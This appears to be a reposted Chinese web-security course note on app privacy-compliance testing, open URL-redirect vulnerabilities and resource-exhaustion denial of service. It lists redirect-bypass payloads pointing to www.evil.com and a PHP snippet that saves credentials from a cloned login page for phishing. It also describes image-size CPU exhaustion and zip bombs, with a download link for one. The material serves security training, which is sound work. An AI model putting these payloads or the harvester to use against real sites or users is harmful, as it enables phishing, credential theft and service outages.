第77天:业务设计篇&隐私合规检测&URL重定向&资源拒绝服务&配合项目

知识点

  1. 隐私合规 - 判断规则 & 检测项目
  2. URL 重定向 - 检测判断 & 钓鱼配合
  3. 资源拒绝服务 - 加载受控 & 处理受控

小迪说在实战中用不到,在 SRC 里面可能会字典

演示案例

隐私合规 - 判断规则 & 检测项目

  • 主要针对小程序 (小程序可能需要逆向) 和 APP

  • 对象:APP 小程序等,测试时即可测试目标的 app 或者小程序是否隐私合规

  • 例如检测目标是否在偷偷监听、录音、获取信息等

  • 具体:后续 APP 安全课程

    • appscan 官网:

      https://appscan.ly.com/

      • 推荐这个,这个是动态分析
      • 不过需要 root 安卓手机并且打开 ADB 调试
    • appshark 的 GitHub 地址:

      https://github.com/bytedance/appshark

      • 这个是静态分析
  • vivo 隐私合规漏洞评分规则 v1.0 参考:https://mp.weixin.qq.com/s/tgEZth3TFyyis_EBrQ5PhQ

  • MobSF 也可以进行测试

  • Windows – MobSF 安装参考:

    • https://www.cnblogs.com/B-hai/p/15696948.html
    • https://blog.csdn.net/ljh824144294/article/details/119181803
    • 补充:自己搭建比较麻烦,容易出很多莫名问题,第 20 天课程中有一个 f8x 项目,可以自动化搭建,推荐使用这个来搭建。
  • mobsf 分析 apk 后可以得到报告,查看报告内容

    • 可以看到该 apk 需要使用到的权限,然后看使用 apk 时是否会有提示

URL 重定向 - 检测判断 & 钓鱼配合

含义

  • URL 重定向漏洞(URL redirection vulnerability),是一种常见的 Web 安全漏洞,由于网站 URL 重定向功能设计不当,没有验证跳转的目标 URL 是否合法,用户可通过此漏洞跳转到任意网站,这会导致可通过该网站跳转到存在木马、病毒的网站或者钓鱼网站,国外大厂的一个任意 URL 跳转都 500$、1000$ 了,国内看运气~

黑盒

看业务

  • 用户登录、统一身份认证处,认证完后会跳转
  • 用户分享、收藏内容过后,会跳转
  • 跨站点认证、授权后,会跳转
  • 站内点击其它网址链接时,会跳转

看参数名

1
redirect redirect_to redirect_url url jump jump_to target to link linkto domain

比如可以使用 google 语法搜索:

1
site:xxx.xxx inurl:?url=

白盒看代码块

  • Java
    • response.sendRedirect(request.getParameter(“url”))
  • PHP:
    • $redirect_url = $_GET[‘url’];
    • header(“Location: “ . $redirect_url)
  • .NET:
    • string redirect_url = request.QueryString[“url”];
    • Response.Redirect(redirect_url);
  • Django:
    • redirect_url = request.GET.get(“url”)
    • HttpResponseRedirect(redirect_url)
  • Flask:
    • redirect_url = request.form[‘url’]
    • redirect(redirect_url)
  • Rails:
    • redirect_to params[:url]

跳转 url 绕过思路

  • 单斜线 “/“ 绕过

    1
    https://www.landgrey.me/redirect.php?url=/www.evil.com
  • 缺少协议绕过

    1
    https://www.landgrey.me/redirect.php?url=//www.evil.com
  • 多斜线 “/“ 前缀绕过

    1
    https://www.landgrey.me/redirect.php?url=///www.evil.com https://www.landgrey.me/redirect.php?url=www.evil.com
  • 利用 “@” 符号绕过

    1
    https://www.landgrey.me/redirect.php?url=https://www.landgrey.me@www.evil.com
  • 利用反斜线 “" 绕过

    1
    https://www.landgrey.me/redirect.php?url=https://www.evil.com\www.landgrey.me
  • 利用 “#” 符号绕过

    1
    https://www.landgrey.me/redirect.php?url=https://www.evil.com#www.landgrey.me
  • 利用 “?” 号绕过

    1
    https://www.landgrey.me/redirect.php?url=https://www.evil.com?www.landgrey.me
  • 利用 “\“ 绕过

    1
    https://www.landgrey.me/redirect.php?url=https://www.evil.com\\www.landgrey.me
  • 利用 “.” 绕过

    1
    2
    3
    4
    https://www.landgrey.me/redirect.php?url=.evil           
    (可能会跳转到www.landgrey.me.evil域名)
    https://www.landgrey.me/redirect.php?url=.evil.com
    (可能会跳转到evil.com域名)
  • 重复特殊字符绕过

    1
    2
    https://www.landgrey.me/redirect.php?url=///www.evil.com//.. 
    https://www.landgrey.me/redirect.php?url=www.evil.com//..

钓鱼配合

  • 使用 Teleport Ultra 工具将目标网站整个页面爬取下来

    • 下载使用可参考:https://blog.csdn.net/qq_44035882/article/details/127531747

    • 自己会用什么语言,就用什么语言写劫持代码,如这里使用 php,将原本的 login.html 修改为 login.php

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      在文件开头添加php代码 
      <?php
      $u=$_POST['username'];
      $p=$_POST['password'];
      $f=fopen('pass.txt','a+');
      fwrite($f,$u."|".$p."\n");
      fclose($f);
      ?>

      使用form包裹输入用户名密码的地方,将用户名密码提交到当前文件
      <form action="login.php" method="POST">
      提交参数名记得要和php代码中的对应
      </form>

      这样用户名密码就会保存到 pass.txt 中

资源拒绝服务 - 加载受控 & 处理受控

  • 功能 1:网站验证码或图片可以自定义显示大小
    • 将大小设置为很大,将服务器 cpu 拉满,达到拒绝服务的目的
  • 功能 2:网站可以上传压缩包解压循环
    • 压缩包里面还是压缩包 (套娃即压缩包炸弹) 造成资源占用,达到拒绝服务的目的
    • 压缩包炸弹和测试页面的网盘链接:
      • https://pan.baidu.com/s/1pa0OA6R5vckTDchYvvqdfw?pwd=4291
  • 需要看网站本身是做什么功能的,要根据网站功能决定

image-20250828113037422

如果网站有对压缩包有解压的功能,可以尝试解压炸弹,进行拒绝服务尝试。

转载:https://www.suyou.world/index.php/2024/01/29/%e7%ac%ac77%e5%a4%a9%ef%bc%9aweb%e6%94%bb%e9%98%b2-%e4%b8%9a%e5%8a%a1%e8%ae%be%e8%ae%a1%e7%af%87%e9%9a%90%e7%a7%81%e5%90%88%e8%a7%84%e6%a3%80%e6%b5%8burl%e9%87%8d%e5%ae%9a%e5%90%91%e8%b5%84/